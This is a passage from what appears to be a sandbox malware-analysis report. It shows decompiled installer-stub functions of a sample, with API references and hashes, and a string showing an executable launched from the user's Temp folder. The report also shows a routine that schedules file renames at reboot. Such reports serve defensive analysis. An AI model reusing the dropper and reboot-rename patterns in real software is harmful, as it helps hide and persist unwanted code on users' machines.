					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216d4 =  *0x4216d4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004044CA(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281c0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E004048D1(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a228, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a228, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216d4 != 0) {
						goto L27;
					} else {
						_t116 =  *0x4226e0 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404485(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048AD();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x4291fc - 4 + _t75 * 4);
				}
				_t76 =  *0x42a258 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E004045D3;
				if(_t110 != 2) {
					_v8 = E00404599;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404463(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404463(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404485( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E00404498(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a230 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216d4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216d4 = 0;
				return 0;
			}


















                                  0x00404634
                                  0x00404761
                                  0x004047be
                                  0x004047c2
                                  0x0040488f
                                  0x00404891
                                  0x00404891
                                  0x00404897
                                  0x00404897
                                  0x0040489a
                                  0x00000000
                                  0x004048a1
                                  0x004047d0
                                  0x004047d6
                                  0x004047e0
                                  0x004047eb
                                  0x004047ee
                                  0x004047f1
                                  0x004047fc
                                  0x004047ff
                                  0x00404806
                                  0x00404813
                                  0x00404824
                                  0x0040482a
                                  0x00404832
                                  0x00404840
                                  0x00404846
                                  0x00404846
                                  0x00404806
                                  0x00404850
                                  0x00000000
                                  0x0040485b
                                  0x0040485f
                                  0x0040486f
                                  0x0040486f
                                  0x00404875
                                  0x00404881
                                  0x00404881
                                  0x00000000
                                  0x00404885
                                  0x00404850
                                  0x0040476c
                                  0x00000000
                                  0x0040477e
                                  0x00404783
                                  0x00404789
                                  0x00000000
                                  0x00000000
                                  0x004047b2
                                  0x004047b4
                                  0x004047b9
                                  0x00000000
                                  0x004047b9
                                  0x0040476c
                                  0x0040463a
                                  0x0040463d
                                  0x00404642
                                  0x00404653
                                  0x00404653
                                  0x0040465b
                                  0x0040465e
                                  0x00404662
                                  0x00404665
                                  0x00404669
                                  0x0040466c
                                  0x0040466f
                                  0x00404672
                                  0x00404679
                                  0x0040467b
                                  0x0040467b
                                  0x00404685
                                  0x00404692
                                  0x0040469c
                                  0x004046a1
                                  0x004046a4
                                  0x004046a9
                                  0x004046c0
                                  0x004046c7
                                  0x004046da
                                  0x004046dd
                                  0x004046f1
                                  0x004046f8
                                  0x004046fd
                                  0x00404702
                                  0x00404702
                                  0x00404710
                                  0x0040471e
                                  0x00404730
                                  0x00404735
                                  0x00404745
                                  0x00404747
                                  0x00000000

                                  APIs
                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
                                  • GetDlgItem.USER32 ref: 004046D4
                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
                                  • GetSysColor.USER32(?), ref: 00404702
                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
                                  • lstrlenW.KERNEL32(?), ref: 00404723
                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
                                  • GetDlgItem.USER32 ref: 0040479E
                                  • SendMessageW.USER32(00000000), ref: 004047A5
                                  • GetDlgItem.USER32 ref: 004047D0
                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404821
                                  • SetCursor.USER32(00000000), ref: 00404824
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
                                  • SetCursor.USER32(00000000), ref: 00404840
                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881
                                  Strings
                                  • N, xrefs: 004047BE
                                  • C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj, xrefs: 004047FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj$N
                                  • API String ID: 3103080414-2756946670
                                  • Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                  • Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
                                  • Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                  • Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a230;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429220, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a228;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                  0x0040100a
                                  0x00401039
                                  0x00401047
                                  0x0040104d
                                  0x00401051
                                  0x0040105b
                                  0x00401061
                                  0x00401064
                                  0x004010f3
                                  0x00401089
                                  0x0040108c
                                  0x004010a6
                                  0x004010bd
                                  0x004010cc
                                  0x004010cf
                                  0x004010d5
                                  0x004010d9
                                  0x004010e4
                                  0x004010ed
                                  0x004010ef
                                  0x004010ef
                                  0x00401100
                                  0x00401105
                                  0x0040110d
                                  0x00401110
                                  0x00401112
                                  0x00401118
                                  0x0040111f
                                  0x00401126
                                  0x00401130
                                  0x00401142
                                  0x00401156
                                  0x00401160
                                  0x00401165
                                  0x00401165
                                  0x00401110
                                  0x0040116e
                                  0x00000000
                                  0x00401178
                                  0x00401010
                                  0x00401013
                                  0x00401015
                                  0x0040101f
                                  0x0040101f
                                  0x00000000

                                  APIs
                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                  • BeginPaint.USER32(?,?), ref: 00401047
                                  • GetClientRect.USER32 ref: 0040105B
                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                  • FillRect.USER32 ref: 004010E4
                                  • DeleteObject.GDI32(?), ref: 004010ED
                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                  • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                  • DeleteObject.GDI32(?), ref: 00401165
                                  • EndPaint.USER32(?,?), ref: 0040116E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                  • String ID: F
                                  • API String ID: 941294808-1304234792
                                  • Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                  • Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
                                  • Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                  • Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040614D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040614D(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426da8 = 0x55004e;
				 *0x426dac = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4275a8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269a8, "%ls=%ls\r\n", 0x426da8, 0x4275a8);
						_t53 = _t52 + 0x10;
						E00406544(_t37, 0x400, 0x4275a8, 0x4275a8,  *((intOrPtr*)( *0x42a230 + 0x128)));
						_t12 = E00405FF7(0x4275a8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E0040607A(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F5C(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F5C(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FB2(_t24 + _t46, 0x4269a8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060A9(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405FF7(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426da8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                  0x0040614d
                                  0x00406156
                                  0x0040615d
                                  0x00406167
                                  0x0040617b
                                  0x004061a3
                                  0x004061ae
                                  0x004061b2
                                  0x004061d2
                                  0x004061d9
                                  0x004061e3
                                  0x004061f0
                                  0x004061f5
                                  0x004061fa
                                  0x004061fe
                                  0x0040620d
                                  0x0040620f
                                  0x0040621c
                                  0x00406220
                                  0x004062bb
                                  0x00000000
                                  0x00406236
                                  0x00406243
                                  0x00406267
                                  0x0040626b
                                  0x0040628a
                                  0x0040628e
                                  0x0040628e
                                  0x00406290
                                  0x00406299
                                  0x004062a4
                                  0x004062af
                                  0x004062b5
                                  0x00000000
                                  0x004062b5
                                  0x0040626d
                                  0x00406270
                                  0x0040627b
                                  0x00406277
                                  0x00406279
                                  0x0040627a
                                  0x0040627a
                                  0x00406282
                                  0x00406284
                                  0x00000000
                                  0x00406284
                                  0x0040624e
                                  0x00406254
                                  0x00000000
                                  0x00406254
                                  0x00406220
                                  0x004061fe
                                  0x0040617d
                                  0x00406188
                                  0x00406191
                                  0x00406195
                                  0x00000000
                                  0x00000000
                                  0x00406195
                                  0x004062c6

                                  APIs
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
                                  • GetShortPathNameW.KERNEL32 ref: 00406191
                                    • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                    • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                  • GetShortPathNameW.KERNEL32 ref: 004061AE
                                  • wsprintfA.USER32 ref: 004061CC
                                  • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
                                  • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
                                  • GlobalFree.KERNEL32 ref: 004062B5
                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC
                                    • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\4505682666.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                    • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                  • String ID: %ls=%ls$[Rename]
                                  • API String ID: 2171350718-461813615
                                  • Opcode ID: 103a52d89d2190fa92995d585e71df630d47c1fe56f755659e2bb6cae3d098e7
                                  • Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
                                  • Opcode Fuzzy Hash: 103a52d89d2190fa92995d585e71df630d47c1fe56f755659e2bb6cae3d098e7
                                  • Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406544 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00406544(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x4291fc - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a258 + _t44 * 2;
				_t45 = 0x4281c0;
				_t108 = 0x4281c0;
				if(_a4 >= 0x4281c0 && _a4 - 0x4281c0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406507(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E00406544(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x4281c0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406507(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E0040644E(_t108,  *0x42a228);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E0040678E(_t108);
							}
							goto L38;
						}
						if( *0x42a2a4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a224;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a228,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a228,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E004063D5( *0x42a258, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a258 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E00406544(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                  0x00406544
                                  0x00406544
                                  0x00406544
                                  0x0040654a
                                  0x0040654f
                                  0x00406560
                                  0x00406560
                                  0x00406568
                                  0x00406569
                                  0x0040656a
                                  0x0040656b
                                  0x0040656e
                                  0x00406576
                                  0x00406578
                                  0x00406589
                                  0x0040658c
                                  0x0040658c
                                  0x00406590
                                  0x00406596
                                  0x00406599
                                  0x00406774
                                  0x00406774
                                  0x0040677f
                                  0x0040678b
                                  0x0040678b
                                  0x00000000
                                  0x0040659f
                                  0x004065a4
                                  0x004065b9
                                  0x004065ba
                                  0x004065c0
                                  0x00406752
                                  0x00406760
                                  0x00406763
                                  0x00406763
                                  0x00406754
                                  0x00406757
                                  0x0040675a
                                  0x0040675c
                                  0x0040675c
                                  0x00406765
                                  0x00406765
                                  0x0040676b
                                  0x0040676e
                                  0x004065a1
                                  0x00000000
                                  0x004065a1
                                  0x00000000
                                  0x0040676e
                                  0x004065c6
                                  0x004065c9
                                  0x004065d8
                                  0x004065df
                                  0x004065eb
                                  0x004065ee
                                  0x004065f1
                                  0x004065f2
                                  0x004065f7
                                  0x004065fd
                                  0x00406600
                                  0x00406603
                                  0x004066f6
                                  0x004066fb
                                  0x0040672e
                                  0x00406733
                                  0x00406738
                                  0x0040673d
                                  0x0040673d
                                  0x00406742
                                  0x00406748
                                  0x0040674b
                                  0x00000000
                                  0x0040674b
                                  0x004066fd
                                  0x00406700
                                  0x00406703
                                  0x00406718
                                  0x0040671f
                                  0x00406705
                                  0x0040670c
                                  0x0040670c
                                  0x00406727
                                  0x0040672a
                                  0x004066ee
                                  0x004066ef
                                  0x004066ef
                                  0x00000000
                                  0x0040672a
                                  0x00406610
                                  0x00406614
                                  0x00406614
                                  0x00406615
                                  0x00406617
                                  0x00406654
                                  0x00406657
                                  0x00406667
                                  0x0040666a
                                  0x00406672
                                  0x00406678
                                  0x00406678
                                  0x004066d3
                                  0x004066d3
                                  0x004066d5
                                  0x00000000
                                  0x00000000
                                  0x0040667c
                                  0x00406681
                                  0x00406682
                                  0x00406684
                                  0x0040669b
                                  0x004066a9
                                  0x004066af
                                  0x004066b1
                                  0x004066cf
                                  0x004066cf
                                  0x004066cf
                                  0x00000000
                                  0x004066cf
                                  0x004066b7
                                  0x004066c0
                                  0x004066c3
                                  0x004066c9
                                  0x004066cd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004066cd
                                  0x00406695
                                  0x00406697
                                  0x00406699
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406699
                                  0x00000000
                                  0x004066d3
                                  0x0040665f
                                  0x00000000
                                  0x00406619
                                  0x00406637
                                  0x00406640
                                  0x004066dd
                                  0x004066e1
                                  0x004066e9
                                  0x004066e9
                                  0x00000000
                                  0x004066e1
                                  0x0040664a
                                  0x004066d7
                                  0x004066db
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004066db
                                  0x00406617
                                  0x00000000
                                  0x004065a4

                                  APIs
